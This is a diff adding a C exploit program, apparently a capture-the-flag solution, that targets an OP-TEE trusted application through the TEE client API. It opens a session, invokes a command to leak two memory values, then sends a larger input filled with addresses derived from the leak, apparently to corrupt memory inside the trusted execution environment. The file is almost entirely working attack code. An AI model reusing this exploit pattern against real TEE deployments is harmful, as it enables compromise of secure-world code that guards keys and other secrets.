|
| 1 | +#include <err.h> |
| 2 | +#include <stdio.h> |
| 3 | +#include <string.h> |
| 4 | +#include <stdlib.h> |
| 5 | +#include "tee_client_api.h" |
| 6 | + |
| 7 | +/* |
| 8 | + build libtee: https://optee.readthedocs.io/en/latest/building/gits/optee_client.html |
| 9 | + compile exploit: `aarch64-linux-gnu-gcc exp.c libteec.a` |
| 10 | +*/ |
| 11 | + |
| 12 | +#define TA_DEADBEEF_UUID \ |
| 13 | +{ 0xdeadbeef, 0xdead, 0xdead, \ |
| 14 | + { 0xde, 0xad, 0xde, 0xad, 0xde, 0xad, 0xbe, 0xef} } |
| 15 | + |
| 16 | +int main(void) |
| 17 | +{ |
| 18 | + TEEC_Result res; |
| 19 | + TEEC_Context ctx; |
| 20 | + TEEC_Session sess; |
| 21 | + TEEC_Operation op; |
| 22 | + TEEC_UUID uuid = TA_DEADBEEF_UUID; |
| 23 | + uint32_t err_origin; |
| 24 | + |
| 25 | + res = TEEC_InitializeContext(NULL, &ctx); |
| 26 | + if (res != TEEC_SUCCESS) |
| 27 | + errx(1, "TEEC_InitializeContext failed with code 0x%x", res); |
| 28 | + |
| 29 | + res = TEEC_OpenSession(&ctx, &sess, &uuid, |
| 30 | + TEEC_LOGIN_PUBLIC, NULL, NULL, &err_origin); |
| 31 | + if (res != TEEC_SUCCESS) |
| 32 | + errx(1, "TEEC_Opensession failed with code 0x%x origin 0x%x", |
| 33 | + res, err_origin); |
| 34 | + |
| 35 | + memset(&op, 0, sizeof(op)); |
| 36 | + |
| 37 | + long *buf = malloc(0x20000); |
| 38 | + memset(buf, 0, sizeof(buf)); |
| 39 | + buf[0] = 0x41414141; |
| 40 | + TEEC_TempMemoryReference tmpbuf = { |
| 41 | + .buffer = buf, |
| 42 | + .size = 0x8 |
| 43 | + }; |
| 44 | + long *buf2 = malloc(0x20000); |
| 45 | + TEEC_TempMemoryReference tmpbuf2 = { |
| 46 | + .buffer = buf2, |
| 47 | + .size = 0x8 |
| 48 | + }; |
| 49 | + long *buf3 = malloc(0x20000); |
| 50 | + TEEC_TempMemoryReference tmpbuf3 = { |
| 51 | + .buffer = buf3, |
| 52 | + .size = 0x8 |
| 53 | + }; |
| 54 | + |
| 55 | + // 0x665 |
| 56 | + op.paramTypes = TEEC_PARAM_TYPES( |
| 57 | + TEEC_MEMREF_TEMP_INPUT, |
| 58 | + TEEC_MEMREF_TEMP_OUTPUT, |
| 59 | + TEEC_MEMREF_TEMP_OUTPUT, |
| 60 | + TEEC_NONE |
| 61 | + ); |
| 62 | + |
| 63 | + op.params[0].tmpref = tmpbuf; |
| 64 | + op.params[1].tmpref = tmpbuf2; |
| 65 | + op.params[2].tmpref = tmpbuf3; |
| 66 | + |
| 67 | + res = TEEC_InvokeCommand(&sess, 0, &op, &err_origin); |
| 68 | + if (res != TEEC_SUCCESS) |
| 69 | + errx(1, "TEEC_InvokeCommand failed with code 0x%x origin 0x%x", |
| 70 | + res, err_origin); |
| 71 | + |
| 72 | + printf("buf2: %lx, buf3: %lx\n", buf2[0], buf3[0]); |
| 73 | + |
| 74 | + for (int i = 1; i < 15; ++i) { |
| 75 | + buf[i] = buf3[0] - 0x20 + 0x200; |
| 76 | + } |
| 77 | + op.params[0].tmpref.size = 0x30; |
| 78 | + res = TEEC_InvokeCommand(&sess, 0, &op, &err_origin); |
| 79 | + if (res != TEEC_SUCCESS) |
| 80 | + errx(1, "TEEC_InvokeCommand failed with code 0x%x origin 0x%x", |
| 81 | + res, err_origin); |
| 82 | + |
| 83 | + TEEC_CloseSession(&sess); |
| 84 | + TEEC_FinalizeContext(&ctx); |
| 85 | + |
| 86 | + return 0; |
| 87 | +} |
0 commit comments